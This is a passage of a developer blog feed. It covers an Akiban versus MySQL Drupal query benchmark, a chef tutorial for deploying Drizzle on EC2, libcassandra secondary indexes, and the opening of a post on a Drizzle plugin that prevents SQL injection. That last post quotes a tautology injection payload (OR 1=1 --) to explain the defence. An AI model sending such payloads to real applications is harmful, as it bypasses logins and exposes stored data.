         &lt;span class='k'&gt;ON&lt;/span&gt; &lt;span class='n'&gt;node&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='n'&gt;nid&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; &lt;span class='n'&gt;node_comment_statistics&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='n'&gt;nid&lt;/span&gt; 
&lt;span class='k'&gt;WHERE&lt;/span&gt;  &lt;span class='p'&gt;((&lt;/span&gt; &lt;span class='p'&gt;(&lt;/span&gt; &lt;span class='n'&gt;node&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='n'&gt;status&lt;/span&gt; &lt;span class='o'&gt;=&lt;/span&gt; &lt;span class='s1'&gt;&amp;#39;1&amp;#39;&lt;/span&gt; &lt;span class='p'&gt;)&lt;/span&gt; 
          &lt;span class='k'&gt;AND&lt;/span&gt; &lt;span class='p'&gt;(&lt;/span&gt; &lt;span class='n'&gt;node&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='k'&gt;comment&lt;/span&gt; &lt;span class='k'&gt;IN&lt;/span&gt; &lt;span class='p'&gt;(&lt;/span&gt; &lt;span class='s1'&gt;&amp;#39;2&amp;#39;&lt;/span&gt; &lt;span class='p'&gt;)&lt;/span&gt; &lt;span class='p'&gt;)&lt;/span&gt; 
          &lt;span class='k'&gt;AND&lt;/span&gt; &lt;span class='p'&gt;(&lt;/span&gt; &lt;span class='n'&gt;node&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='n'&gt;nid&lt;/span&gt; &lt;span class='o'&gt;&amp;gt;=&lt;/span&gt; &lt;span class='s1'&gt;&amp;#39;111&amp;#39;&lt;/span&gt; &lt;span class='p'&gt;)&lt;/span&gt; 
          &lt;span class='k'&gt;AND&lt;/span&gt; &lt;span class='p'&gt;(&lt;/span&gt; &lt;span class='n'&gt;node_comment_statistics&lt;/span&gt;&lt;span class='p'&gt;.&lt;/span&gt;&lt;span class='n'&gt;comment_count&lt;/span&gt; &lt;span class='o'&gt;&amp;gt;=&lt;/span&gt; &lt;span class='s1'&gt;&amp;#39;2&amp;#39;&lt;/span&gt; &lt;span class='p'&gt;)&lt;/span&gt; &lt;span class='p'&gt;))&lt;/span&gt;
&lt;span class='k'&gt;ORDER&lt;/span&gt;  &lt;span class='k'&gt;BY&lt;/span&gt; &lt;span class='n'&gt;node_created&lt;/span&gt; &lt;span class='k'&gt;ASC&lt;/span&gt; 
&lt;span class='k'&gt;LIMIT&lt;/span&gt;  &lt;span class='mi'&gt;50&lt;/span&gt; &lt;span class='k'&gt;offset&lt;/span&gt; &lt;span class='mi'&gt;0&lt;/span&gt; 
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h1 id='performance_comparison'&gt;Performance Comparison&lt;/h1&gt;

&lt;p&gt;The response time of the query in Akiban versus MySQL is shown below.&lt;/p&gt;
&lt;div&gt;
  &lt;img src='/images/drupal_view_response_time.png' alt='Response time comparison.' /&gt;
&lt;/div&gt;
&lt;p&gt;As seen in the image above, Akiban can execute the query in question in 5 ms or less whereas MySQL consistently takes 1200 ms to execute the query. In the next section I&amp;#8217;ll go into details of how Akiban executes this query.&lt;/p&gt;

&lt;p&gt;Secondly, I used MySQL&amp;#8217;s mysqlslap benchmark tool to measure how Akiban performs versus MySQL at varying degrees of concurrency (a sketch of the invocation follows the chart below).&lt;/p&gt;
&lt;div&gt;
  &lt;img src='/images/drupal_view_throughput.png' alt='Throughput comparison.' /&gt;
&lt;/div&gt;
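&lt;p&gt;For those who want to reproduce the throughput numbers, the mysqlslap runs were along the lines of the following sketch. The flags vary between MySQL versions, the file name view_query.sql is hypothetical (it would contain the query shown earlier), and the concurrency levels here are illustrative:&lt;/p&gt;
&lt;pre&gt;
# run the view query against the existing drupal schema at several
# concurrency levels; --no-drop stops mysqlslap from dropping the schema
mysqlslap --user=root --create-schema=drupal --no-drop \
  --query=view_query.sql \
  --concurrency=1,8,16,32 --iterations=10
&lt;/pre&gt;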
&lt;h1 id='mysql_execution_plan'&gt;MySQL Execution Plan&lt;/h1&gt;

&lt;p&gt;Using Maatkit to visualize the MySQL execution plan, we get:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='bash'&gt;JOIN
+- Filter with WHERE
|  +- Bookmark lookup
|     +- Table
|     |  table          node_comment_statistics
|     |  possible_keys  PRIMARY,comment_count
|     +- Unique index lookup
|        key            node_comment_statistics-&amp;gt;PRIMARY
|        possible_keys  PRIMARY,comment_count
|        key_len        4
|        ref            drupal.node.nid
|        rows           1
+- Table scan
   +- TEMPORARY
      table          temporary&lt;span class='o'&gt;(&lt;/span&gt;node&lt;span class='o'&gt;)&lt;/span&gt;
      +- Filter with WHERE
         +- Bookmark lookup
            +- Table
            |  table          node
            |  possible_keys  PRIMARY,node_status_type
            +- Index scan
               key            node-&amp;gt;node_created
               possible_keys  PRIMARY,node_status_type
               key_len        4
               rows           100
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
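&lt;p&gt;To produce a tree like the one above, regular EXPLAIN output can be fed to Maatkit&amp;#8217;s mk-visual-explain, roughly like so (a sketch; view_query.sql is the same hypothetical file holding the query):&lt;/p&gt;
&lt;pre&gt;
mysql -u root drupal -e &quot;EXPLAIN $(cat view_query.sql)&quot; | mk-visual-explain
&lt;/pre&gt;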
&lt;p&gt;MySQL chooses to start from the node table and scans an index on the created column. A temporary table is then created in memory to store the results of this index scan. The items stored in the temporary table are then processed to eliminate duplicates (for the DISTINCT). For each distinct row in the temporary table, MySQL then performs a join to the &lt;code&gt;node_comment_statistics&lt;/code&gt; table by performing an index lookup using its primary key.&lt;/p&gt;

&lt;h1 id='akiban_execution_plan'&gt;Akiban Execution Plan&lt;/h1&gt;

&lt;p&gt;The tables involved in the query fall into a single table group in Akiban: the node group. Grouping is explained by our CTO in this &lt;a href='http://www.akiban.com/blog/2011/04/18/grouping_explained'&gt;post&lt;/a&gt;, which includes a grouping for Drupal where you can see the node group. For this query, grouping means all joins within the node group are executed at essentially zero cost. It also allows for the creation of Akiban group indexes; a group index is an index that can span multiple tables along a single branch within a table group.&lt;/p&gt;

&lt;p&gt;A covering group index for this query is:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='bash'&gt;CREATE INDEX cvr_gi ON node
&lt;span class='o'&gt;(&lt;/span&gt;
  node.status,
  node.comment,
  node.created,
  node.nid,
  node_comment_statistics.comment_count,
  node_comment_statistics.nid,
  node.title
&lt;span class='o'&gt;)&lt;/span&gt; USING LEFT JOIN
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Notice that the &lt;code&gt;node.created&lt;/code&gt; column is included in this index so that a sort can be avoided.&lt;/p&gt;

&lt;p&gt;The other large advantage Akiban brings when executing this query is that the query optimizer is intelligent enough to determine that the DISTINCT is not required, due to the 1-to-1 mapping between &lt;code&gt;node&lt;/code&gt; and &lt;code&gt;node_comment_statistics&lt;/code&gt; and the fact that an INNER JOIN is being performed between these 2 tables. The resulting Akiban execution plan is:&lt;/p&gt;
&lt;div class='highlight'&gt;&lt;pre&gt;&lt;code class='bash'&gt;Limit_Default&lt;span class='o'&gt;(&lt;/span&gt;&lt;span class='nv'&gt;limit&lt;/span&gt;&lt;span class='o'&gt;=&lt;/span&gt;50: project&lt;span class='o'&gt;([&lt;/span&gt;Field&lt;span class='o'&gt;(&lt;/span&gt;6&lt;span class='o'&gt;)&lt;/span&gt;, Field&lt;span class='o'&gt;(&lt;/span&gt;3&lt;span class='o'&gt;)&lt;/span&gt;, Field&lt;span class='o'&gt;(&lt;/span&gt;4&lt;span class='o'&gt;)&lt;/span&gt;, Field&lt;span class='o'&gt;(&lt;/span&gt;2&lt;span class='o'&gt;)]))&lt;/span&gt;
  project&lt;span class='o'&gt;([&lt;/span&gt;Field&lt;span class='o'&gt;(&lt;/span&gt;6&lt;span class='o'&gt;)&lt;/span&gt;, Field&lt;span class='o'&gt;(&lt;/span&gt;3&lt;span class='o'&gt;)&lt;/span&gt;, Field&lt;span class='o'&gt;(&lt;/span&gt;4&lt;span class='o'&gt;)&lt;/span&gt;, Field&lt;span class='o'&gt;(&lt;/span&gt;2&lt;span class='o'&gt;)])&lt;/span&gt;
    Select_HKeyOrdered&lt;span class='o'&gt;(&lt;/span&gt;Index&lt;span class='o'&gt;(&lt;/span&gt;cvr_gi&lt;span class='o'&gt;(&lt;/span&gt;BoolLogic&lt;span class='o'&gt;(&lt;/span&gt;AND -&amp;gt; Field&lt;span class='o'&gt;(&lt;/span&gt;3&lt;span class='o'&gt;)&lt;/span&gt; &amp;gt;&lt;span class='o'&gt;=&lt;/span&gt; Literal&lt;span class='o'&gt;(&lt;/span&gt;111&lt;span class='o'&gt;)&lt;/span&gt;, Field&lt;span class='o'&gt;(&lt;/span&gt;4&lt;span class='o'&gt;)&lt;/span&gt; &amp;gt;&lt;span class='o'&gt;=&lt;/span&gt; Literal&lt;span class='o'&gt;(&lt;/span&gt;2&lt;span class='o'&gt;)&lt;/span&gt; -&amp;gt; BOOL&lt;span class='o'&gt;))&lt;/span&gt;
      IndexScan_Default&lt;span class='o'&gt;(&lt;/span&gt;Index&lt;span class='o'&gt;(&lt;/span&gt;cvr_gi&lt;span class='o'&gt;(&lt;/span&gt;&amp;gt;&lt;span class='o'&gt;=&lt;/span&gt;UnboundExpressions&lt;span class='o'&gt;[&lt;/span&gt;Literal&lt;span class='o'&gt;(&lt;/span&gt;1&lt;span class='o'&gt;)&lt;/span&gt;, Literal&lt;span class='o'&gt;(&lt;/span&gt;2&lt;span class='o'&gt;)]&lt;/span&gt;,&amp;lt;&lt;span class='o'&gt;=&lt;/span&gt;UnboundExpressions&lt;span class='o'&gt;[&lt;/span&gt;Literal&lt;span class='o'&gt;(&lt;/span&gt;1&lt;span class='o'&gt;)&lt;/span&gt;, Literal&lt;span class='o'&gt;(&lt;/span&gt;2&lt;span class='o'&gt;)]))&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The above execution plan is in the Akiban format. In this format, you read the plan like a tree, starting from the leaf nodes. The above plan starts with a scan of the &lt;code&gt;cvr_gi&lt;/code&gt; index using the &lt;code&gt;node.status&lt;/code&gt; and &lt;code&gt;node.comment&lt;/code&gt; predicates. It then filters rows from this scan (the &lt;code&gt;Select_HKeyOrdered&lt;/code&gt; operator performs this filtering) before limiting the results to the size of the result set requested.&lt;/p&gt;

&lt;h1 id='conclusion'&gt;Conclusion&lt;/h1&gt;

&lt;p&gt;To wrap up, I briefly showed some of the performance benefits we are seeing when running Drupal 7 on the Akiban Server. In the not too distant future, we will be open sourcing our stack here at Akiban and providing downloads of the Akiban Server. I will also be making the Drupal 7 database driver for the Akiban Server available for download on drupal.org once it&amp;#8217;s complete.&lt;/p&gt;

&lt;p&gt;If you are interested in trying this out yourself or want to verify the results before this work becomes publicly available, feel free to contact me and I should be able to set you up with access to an EC2 instance so you can try it for yourself.&lt;/p&gt;</content>
 </entry>
 
 <entry>
   <title>Deploy Drizzle on EC2 with chef</title>
   <link href="http://posulliv.github.com/2011/04/07/drizzle-chef"/>
   <updated>2011-04-07T00:00:00-07:00</updated>
   <id>http://posulliv.github.com/2011/04/07/drizzle-chef</id>
   <content type="html">&lt;p&gt;
This post is a tutorial on how to deploy Drizzle on an EC2 instance using chef and the &lt;a href=&quot;http://www.opscode.com/platform/&quot;&gt;Opscode Chef&lt;/a&gt; platform. The tutorial is specifically targeted at Ubuntu; in particular, the procedures outlined here have only been tested on Ubuntu 10.04, but they should apply to other Ubuntu versions with minimal modification.
&lt;/p&gt;

&lt;h2&gt;The Opscode Platform&lt;/h2&gt;

&lt;p&gt;
In this article, we'll use the Opscode platform since it provides an easy way for anyone to get started with chef. If you are a new user, proceed to &lt;a href=&quot;https://community.opscode.com/users/new&quot;&gt;sign up&lt;/a&gt; for a new account. Once you are signed up, the next step is to create a new organization. For this article, I'm going to create an organization named drizzle-test. Once your organization is created, it should appear in your list of organizations when you click on the Organizations link at the top right of the Opscode console. My view looks like this (you should be able to click on the image to see a larger version):
&lt;/p&gt;

&lt;img src=&quot;/images/console_orgs.png&quot; width=750 /&gt;

&lt;h2&gt;Configure AWS&lt;/h2&gt;

&lt;p&gt;
An assumption made in this article is that you have an &lt;a href=&quot;http://aws.amazon.com/&quot;&gt;AWS&lt;/a&gt; account. If you don't, signing up is relatively straightforward.
&lt;/p&gt;

&lt;p&gt;
There are a few EC2 items that need to be configured before starting with chef. Amazon blocks all incoming traffic to EC2 instances by default. SSH is used by chef to access and bootstrap a newly created instance, so we want to allow SSH traffic to our EC2 instances; for this article, I also want to permit traffic to the drizzle port (4427 by default). This is accomplished by configuring Security Groups in the AWS console. You can either create a new security group or modify the default security group. For this article, I'll create a new security group named drizzle and add the appropriate rules. After creating the group and adding the rules, the security group details should look like:
&lt;/p&gt;

&lt;img src=&quot;/images/security_group.png&quot; width=750 /&gt;
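&lt;p&gt;
If you prefer the command line to the AWS console, something along these lines should create an equivalent group using Amazon's EC2 API tools (a sketch only; I created the group through the console myself):
&lt;/p&gt;

&lt;pre&gt;
# create the group, then open the SSH and drizzle ports
ec2-add-group drizzle -d &quot;drizzle security group&quot;
ec2-authorize drizzle -P tcp -p 22
ec2-authorize drizzle -P tcp -p 4427
&lt;/pre&gt;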

&lt;p&gt;
I'll also create a new key pair in the AWS console specifically for this article. I'm going to give this key pair the name drizzle. After creating the key pair, I copy the downloaded private key to my SSH folder and update permissions on the key:
&lt;/p&gt;

&lt;pre&gt;
mv ~/Downloads/drizzle.pem ~/.ssh/
chmod 600 ~/.ssh/drizzle.pem
&lt;/pre&gt;

&lt;h2&gt;Install chef&lt;/h2&gt;

&lt;p&gt;
Installing chef on Ubuntu is quite straightforward. Opscode maintains an APT repository that I simply need to add to my sources list. In the file &lt;code&gt;/etc/apt/sources.list.d/opscode.list&lt;/code&gt;, add the following (replacing lucid with whatever release you are running):
&lt;/p&gt;

&lt;pre&gt;
deb http://apt.opscode.com/ lucid main
&lt;/pre&gt;

&lt;p&gt;
Next, I need to add the GPG key:
&lt;/p&gt;

&lt;pre&gt;
wget -qO - http://apt.opscode.com/packages@opscode.com.gpg.key | sudo apt-key add -
sudo apt-get update
&lt;/pre&gt;

&lt;p&gt;
To install chef, it's as simple as installing the chef package:
&lt;/p&gt;

&lt;pre&gt;
sudo apt-get install chef
&lt;/pre&gt;

&lt;p&gt;
When prompted for the server URL during this package installation, you can leave it blank; we will configure this later. You can also stop and disable the chef-client service now if you wish, since we will only be using the &lt;code&gt;knife&lt;/code&gt; utility in this article (a sketch of doing so follows below). Finally, verify the version you have installed:
&lt;/p&gt;

&lt;pre&gt;
knife -v
&lt;/pre&gt;

&lt;p&gt;
For this article, the output of the above command needs to be at least 0.9.14.
&lt;/p&gt;
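<p>
</p>
&lt;p&gt;
As mentioned above, if you only plan on using knife, stopping and disabling the chef-client service can be done roughly as follows (a sketch for Ubuntu; the exact service management commands vary by release):
&lt;/p&gt;

&lt;pre&gt;
sudo service chef-client stop
sudo update-rc.d -f chef-client remove
&lt;/pre&gt;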

&lt;p&gt;
Other packages required for this article are rubygems and git:
&lt;/p&gt;

&lt;pre&gt;
sudo apt-get install rubygems git
&lt;/pre&gt;

&lt;p&gt;
Once rubygems is installed, there are a few gems required for interacting with EC2:
&lt;/p&gt;

&lt;pre&gt;
sudo gem install net-ssh net-ssh-multi fog highline
&lt;/pre&gt;

&lt;h2&gt;Configure chef&lt;/h2&gt;

&lt;p&gt;
We are now all set to get started. The first thing to do is create a chef repository on your workstation. In this article, I will use git for this:
&lt;/p&gt;

&lt;pre&gt;
git clone https://github.com/opscode/chef-repo.git drizzle-chef-repo
&lt;/pre&gt;

&lt;p&gt;
Create a &lt;code&gt;.chef&lt;/code&gt; directory within this repository. This directory contains all the configuration files for &lt;b&gt;just this&lt;/b&gt; repository:
&lt;/p&gt;

&lt;pre&gt;
mkdir -p ~/drizzle-chef-repo/.chef
&lt;/pre&gt;

&lt;p&gt;
Next, we need to download the keys and knife configuration file used for interacting with the Opscode Platform. Keys are needed for both your user and your organization. To retrieve your user key (if you did not download it when signing up), click on your username in the console and you will see a 'get private key' link on your account page:
&lt;/p&gt;

&lt;img src=&quot;/images/user_key.png&quot; width=750 /&gt;

&lt;p&gt;
After downloading this key, I need to place it in the configuration directory for the chef repository I am using here:
&lt;/p&gt;

&lt;pre&gt;
mv ~/Downloads/posulliv.pem ~/drizzle-chef-repo/.chef
&lt;/pre&gt;

&lt;p&gt;
For your organization, click on the 'Regenerate validation key' and 'Generate knife config' links from the organizations overview page mentioned in the first section of this article. After clicking those 2 links, you will have 2 files: 1) drizzle-test-validator.pem and 2) knife.rb. Move these 2 files into the configuration directory for the chef repository being used for this article:
&lt;/p&gt;

&lt;pre&gt;
mv ~/Downloads/drizzle-test-validator.pem ~/drizzle-chef-repo/.chef
mv ~/Downloads/knife.rb ~/drizzle-chef-repo/.chef
&lt;/pre&gt;

&lt;p&gt;
From now on, whenever you are in the &lt;code&gt;drizzle-chef-repo&lt;/code&gt; directory, the &lt;code&gt;knife&lt;/code&gt; utility will connect to the Opscode Platform. To verify this, let's list the current clients:
&lt;/p&gt;

&lt;pre&gt;
posulliv@curragh:~/drizzle-chef-repo$ knife client list
[
  &quot;drizzle-test-validator&quot;
]
posulliv@curragh:~/drizzle-chef-repo$
&lt;/pre&gt;

&lt;p&gt;
We need to tell &lt;code&gt;knife&lt;/code&gt; about our AWS credentials. This is done by adding the following 2 lines to your &lt;code&gt;knife.rb&lt;/code&gt; file in the &lt;code&gt;~/drizzle-chef-repo/.chef&lt;/code&gt; directory:
&lt;/p&gt;

&lt;pre&gt;
knife[:aws_access_key_id]     = &quot;Your AWS Access Key&quot;
knife[:aws_secret_access_key] = &quot;Your AWS Secret Access Key&quot;
&lt;/pre&gt;

&lt;p&gt;
After adding these credentials I should now be able to list all the EC2 instances associated with my AWS account:
&lt;/p&gt;

&lt;pre&gt;
posulliv@curragh:~/drizzle-chef-repo$ knife ec2 server list
Instance ID      Public IP        Private IP       Flavor           Image            Security Groups  State          
i-5e1ce433       50.17.249.89     10.253.30.159    m1.large         ami-879f70ee     AkibanWeb        running        
i-1bcb4f77       50.16.188.89     10.112.233.119   t1.micro         ami-548c783d     AkibanWeb        running        
i-d6fa10b9       50.17.34.183     10.243.14.15     m1.large         ami-548c783d     AkibanQA         running        
i-98db31f7       50.16.137.154    10.114.246.151   m1.large         ami-548c783d     AkibanQA         running        
i-1e16fc71       174.129.139.237  10.195.205.139   m1.large         ami-548c783d     AkibanQA         running        
posulliv@curragh:~/drizzle-chef-repo$ 
&lt;/pre&gt;

&lt;h2&gt;Drizzle Cookbook&lt;/h2&gt;

&lt;p&gt;
At this point, chef should be configured to work with your AWS account. The next step is to decide on what roles or recipes you want to apply to an instance you create. Since this article is about drizzle, I'll show how to bootstrap an EC2 instance with drizzle. I have developed a simple drizzle cookbook in a fork of Opscode's official cookbook repository that can be retrieved with git:
&lt;/p&gt;

&lt;pre&gt;
cd ~/drizzle-chef-repo
rm -rf cookbooks
git clone git://github.com/posulliv/cookbooks.git
&lt;/pre&gt;

&lt;p&gt;
I have opened a pull request for this fork to get merged into Opscode's official repository. Hopefully, it will get merged in soon.
&lt;/p&gt;

&lt;p&gt;
Now we want to upload cookbooks to our chef server. The only cookbook I will upload in this article is the Drizzle cookbook:
&lt;/p&gt;

&lt;pre&gt;
cd ~/drizzle-chef-repo
knife cookbook upload drizzle
&lt;/pre&gt;

&lt;p&gt;
It is simple to list the cookbooks that have been uploaded so far to your chef server:
&lt;/p&gt;

&lt;pre&gt;
posulliv@curragh:~/drizzle-chef-repo$ knife cookbook list
[
  &quot;drizzle&quot;
]
posulliv@curragh:~/drizzle-chef-repo$ 
&lt;/pre&gt;

&lt;h2&gt;Create and Verify EC2 Instance&lt;/h2&gt;

&lt;p&gt;
We are now ready to create an EC2 instance and have it bootstrap itself and install the drizzle GA release! You will see a spew of output when you issue the command below (feel free to use any AMI or instance flavor you wish; I just picked one):
&lt;/p&gt;

&lt;pre&gt;
knife ec2 server create &quot;recipe[drizzle]&quot; \
--image ami-2d4aa444 \
--flavor m1.small \
--groups drizzle \
--ssh-key drizzle \
--identity-file ~/.ssh/drizzle.pem \
--ssh-user ubuntu
&lt;/pre&gt;

&lt;p&gt;
To verify the server was created, we first check the server list output from EC2:
&lt;/p&gt;

&lt;pre&gt;
posulliv@curragh:~/drizzle-chef-repo$ knife ec2 server list
Instance ID      Public IP        Private IP       Flavor           Image            Security Groups  State          
i-5e1ce433       50.17.249.89     10.253.30.159    m1.large         ami-879f70ee     AkibanWeb        running        
i-1bcb4f77       50.16.188.89     10.112.233.119   t1.micro         ami-548c783d     AkibanWeb        running        
i-d6fa10b9       50.17.34.183     10.243.14.15     m1.large         ami-548c783d     AkibanQA         running        
i-98db31f7       50.16.137.154    10.114.246.151   m1.large         ami-548c783d     AkibanQA         running        
i-1e16fc71       174.129.139.237  10.195.205.139   m1.large         ami-548c783d     AkibanQA         running        
i-c03b5caf       50.17.153.76     10.202.253.78    m1.small         ami-2d4aa444     drizzle          running        
posulliv@curragh:~/drizzle-chef-repo$ 
&lt;/pre&gt;

&lt;p&gt;
We should also verify that it is listed as a node:
&lt;/p&gt;

&lt;pre&gt;
posulliv@curragh:~/drizzle-chef-repo$ knife node list
[
  &quot;i-c03b5caf&quot;
]
posulliv@curragh:~/drizzle-chef-repo$ 
&lt;/pre&gt;

&lt;p&gt;
Finally, if I log onto the EC2 instance I should be able to connect to drizzle:
&lt;/p&gt;

&lt;pre&gt;
posulliv@curragh:~$ ssh -i ~/.ssh/drizzle.pem ubuntu@50.17.153.76
Linux ip-10-116-210-131 2.6.32-305-ec2 #9-Ubuntu SMP Thu Apr 15 04:14:01 UTC 2010 i686 GNU/Linux
Ubuntu 10.04 LTS

Welcome to Ubuntu!
 * Documentation:  https://help.ubuntu.com/

  System information as of Mon Apr 11 23:01:28 UTC 2011

  System load: 0.36             Memory usage: 13%   Processes:       55
  Usage of /:  8.6% of 9.92GB   Swap usage:   0%    Users logged in: 0

  Graph this data and manage this system at https://landscape.canonical.com/
---------------------------------------------------------------------
At the moment, only the core of the system is installed. To tune the 
system to your needs, you can choose to install one or more          
predefined collections of software by running the following          
command:                                                             
                                                                     
   sudo tasksel --section server                                     
---------------------------------------------------------------------

A newer build of the Ubuntu lucid server image is available.
It is named 'release' and has build serial '20110201.1'.
Last login: Mon Apr 11 22:27:04 2011 from 12.43.172.10
ubuntu@ip-10-116-210-131:~$ drizzle
Welcome to the Drizzle client..  Commands end with ; or \g.
Your Drizzle connection id is 9
Connection protocol: mysql
Server version: 2011.03.13 Ubuntu

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

drizzle&gt; 
&lt;/pre&gt;

&lt;h2&gt;Conclusion&lt;/h2&gt;

&lt;p&gt;
Hopefully, this tutorial proves useful. I hope to work more on the Drizzle cookbook in the near future and add support for the various plugin types present in Drizzle.
&lt;/p&gt;
</content>
 </entry>
 
 <entry>
   <title>Secondary Indexes with libcassandra in C++</title>
   <link href="http://posulliv.github.com/2011/02/27/libcassandra-sec-indexes"/>
   <updated>2011-02-27T00:00:00-08:00</updated>
   <id>http://posulliv.github.com/2011/02/27/libcassandra-sec-indexes</id>
   <content type="html">&lt;p&gt;
Last weekend I updated my high-level C++ client for Cassandra, &lt;a href=&quot;https://github.com/posulliv/libcassandra/&quot;&gt;libcassandra&lt;/a&gt;, to support many of the new features in the 0.7 Cassandra release. One of those new features is secondary indexes, and I want to briefly outline how secondary indexes can be used programmatically with libcassandra.
&lt;/p&gt;

&lt;p&gt;
An &lt;a href=&quot;http://www.datastax.com/dev/blog/whats-new-cassandra-07-secondary-indexes&quot;&gt;article&lt;/a&gt; by DataStax gives a great overview of secondary indexes. I'm going to use the example from that article here.
&lt;/p&gt;

&lt;p&gt;
The first thing we must do is create a keyspace and column family. In libcassandra, this is accomplished like so:
&lt;/p&gt;

&lt;script src=&quot;https://gist.github.com/846780.js&quot;&gt;&lt;/script&gt;

&lt;p&gt;
After creating a keyspace and column family to work with, we next want to insert some sample data. I'll use the sample data from the article, but instead of inserting it through the CLI, I'll insert it using libcassandra:
&lt;/p&gt;

&lt;script src=&quot;https://gist.github.com/846777.js&quot;&gt;&lt;/script&gt;

&lt;p&gt;
Next, to perform the same query as was used in the article, the code looks like:
&lt;/p&gt;

&lt;script src=&quot;https://gist.github.com/846782.js&quot;&gt;&lt;/script&gt;

&lt;p&gt;
Currently, the result set is a &lt;code&gt;std::map&lt;/code&gt; of row keys to an inner &lt;code&gt;std::map&lt;/code&gt; of column names to column values. I plan to add support for the result to contain more information about each row in the result set in the future.
&lt;/p&gt;

</content>
 </entry>
 
 <entry>
   <title>SQL Injection Prevention in Drizzle</title>
   <link href="http://posulliv.github.com/2010/12/05/stad-plugin"/>
   <updated>2010-12-05T00:00:00-08:00</updated>
   <id>http://posulliv.github.com/2010/12/05/stad-plugin</id>
   <content type="html">&lt;p&gt;
SQL injection attacks occur frequently nowadays. While attacks of this nature are completely avoidable when safe programming techniques are used, they still occur in practice. 
&lt;/p&gt;

&lt;p&gt;
With this in mind, I developed a plugin for Drizzle named STAD that utilizes the &lt;a href=&quot;http://posulliv.github.com/2010/03/01/query-rewrite.html&quot;&gt;query rewriting plugin interface&lt;/a&gt; to prevent SQL injection attacks. The target use case for this plugin is a hosted environment where the applications being developed are independent of the database layer, i.e., a DBA cannot control how a developer chooses to develop their application. I also mainly did this as a side project to demonstrate a use case for the query rewriting API.
&lt;/p&gt;

&lt;h2&gt;Overview&lt;/h2&gt;

&lt;p&gt;
STAD is a practical protection mechanism that applies the concept of instruction-set randomization to SQL: the SQL standard keywords are modified by appending a random key to them, one that an attacker cannot easily guess. Queries injected by an attacker into a randomized query will be caught since they will not contain the randomization key. The plugin will then just execute a harmless query (for now it is 'SELECT 1') instead of returning any error information to a potential attacker. The security of this approach is dependent on attackers not being able to discover the randomization key. If the key is exposed to an attacker, they will have the ability to inject SQL with the appropriate key appended to keywords.
&lt;/p&gt;

&lt;p&gt;
This solution was first developed in the research paper &lt;a href=&quot;http://citeseerx.ist.psu.edu/viewdoc/summary?doi=10.1.1.10.4549&quot;&gt;'SQLrand: Preventing SQL Injection Attacks'&lt;/a&gt;. In their implementation of the idea, a proxy was developed that sat between the application and the database server. Thus, while it was a database independent solution, the overhead of the proxy layer and the introduction of a new component made it impractical.
&lt;/p&gt;

&lt;p&gt;
In Drizzle, this functionality is enabled through the query rewriting API. When the plugin is loaded and a randomization key is specified, all queries issued against the database must contain the correct randomization key or they will not execute correctly. The plugin ships with a version of the drizzle command line client that automatically appends the correct randomization key to SQL keywords; an administrator is encouraged to use this client whenever the plugin is loaded and a key is specified.
&lt;/p&gt;

&lt;p&gt;
To get an idea of how the plugin works, I created a simple diagram to illustrate the steps involved in executing a query when the plugin is enabled. 
&lt;/p&gt;

&lt;img src=&quot;../../../images/stad_arch.jpg&quot; width=750 /&gt;

&lt;p&gt;
In step (1) in the diagram above, a client driver (in this case ruby which I will link to later) establishes a connection with the server and asks the STAD plugin for the current randomization key. In step (2), this key is returned to the driver (right now it is transferred as plaintext) and stored there for the duration of the connection.
&lt;/p&gt;

&lt;p&gt;
In step (3), an application issues a query which goes through a client driver. This client driver randomizes the query using the randomization key obtained from the STAD plugin in step (2). It is this randomized query that is submitted to the server in step (4). Step (5) occurs before the query is parsed by the drizzle kernel. The STAD plugin de-randomizes the query and if all SQL keywords were randomized with the correct randomization key, it passes the correct query onto the drizzle query execution engine in step (6).
&lt;/p&gt;

&lt;p&gt;
Steps (7) and (8) are simply the returning of a result set to the client driver and application sitting above it.
&lt;/p&gt;

&lt;h2&gt;Attack Examples&lt;/h2&gt;

&lt;p&gt;
In the survey paper &lt;a href=&quot;http://www-rcf.usc.edu/~halfond/papers/halfond06issse.pdf&quot;&gt;'A Classification of SQL Injection Attacks and Countermeasures'&lt;/a&gt;, the authors describe a number of SQL injection attack types. I'm going to go through a few of these attack types, the examples from the paper that go along with them, and how the STAD plugin can prevent them. For these attack types and examples, it is assumed that the application is badly written and dynamically builds a SQL query from user input without any validation of the input data. The query that will be constructed is:
&lt;/p&gt;

&lt;pre&gt;
SELECT accounts FROM users WHERE login='name' AND pass='pass' AND pin=pinno
&lt;/pre&gt;

&lt;p&gt;
The login, pass, and pin conditions in the WHERE clause are obtained from user input.
&lt;/p&gt;

&lt;h3&gt;Tautologies&lt;/h3&gt;

&lt;p&gt;
The general goal of a tautology-based attack is to inject code in one or more conditional statements so that they always evaluate to true. The consequences of this attack depend on how the results of the query are used within the application.
&lt;/p&gt;

&lt;p&gt;
This attack type has three main goals:
&lt;/p&gt;

&lt;ol&gt;
  &lt;li&gt;bypass authentication&lt;/li&gt;
  &lt;li&gt;identify injectable parameters&lt;/li&gt;
  &lt;li&gt;extract data&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;
An example of this attack would be:
&lt;/p&gt;

&lt;pre&gt;
SELECT accounts FROM users WHERE login='' OR 1=1 -- AND pass='' AND pin=
&lt;/pre&gt;

&lt;p&gt;
In this example, an attacker has injected a conditional (OR 1=1) that transforms the entire WHERE clause into a tautology and so every row in the users table will be returned.
&lt;/p&gt;

&lt;p&gt;
This attack would be prevented using our approach. Assume for a moment that the randomization key is the string '1234'. In this case, the query issued to the drizzle server would look like:
&lt;/p&gt;

&lt;pre&gt;
SELECT1234 accounts FROM1234 users WHERE1234 login='' OR 1=1 -- AND1234 pass='' AND1234 pin=
&lt;/pre&gt;

&lt;p&gt;
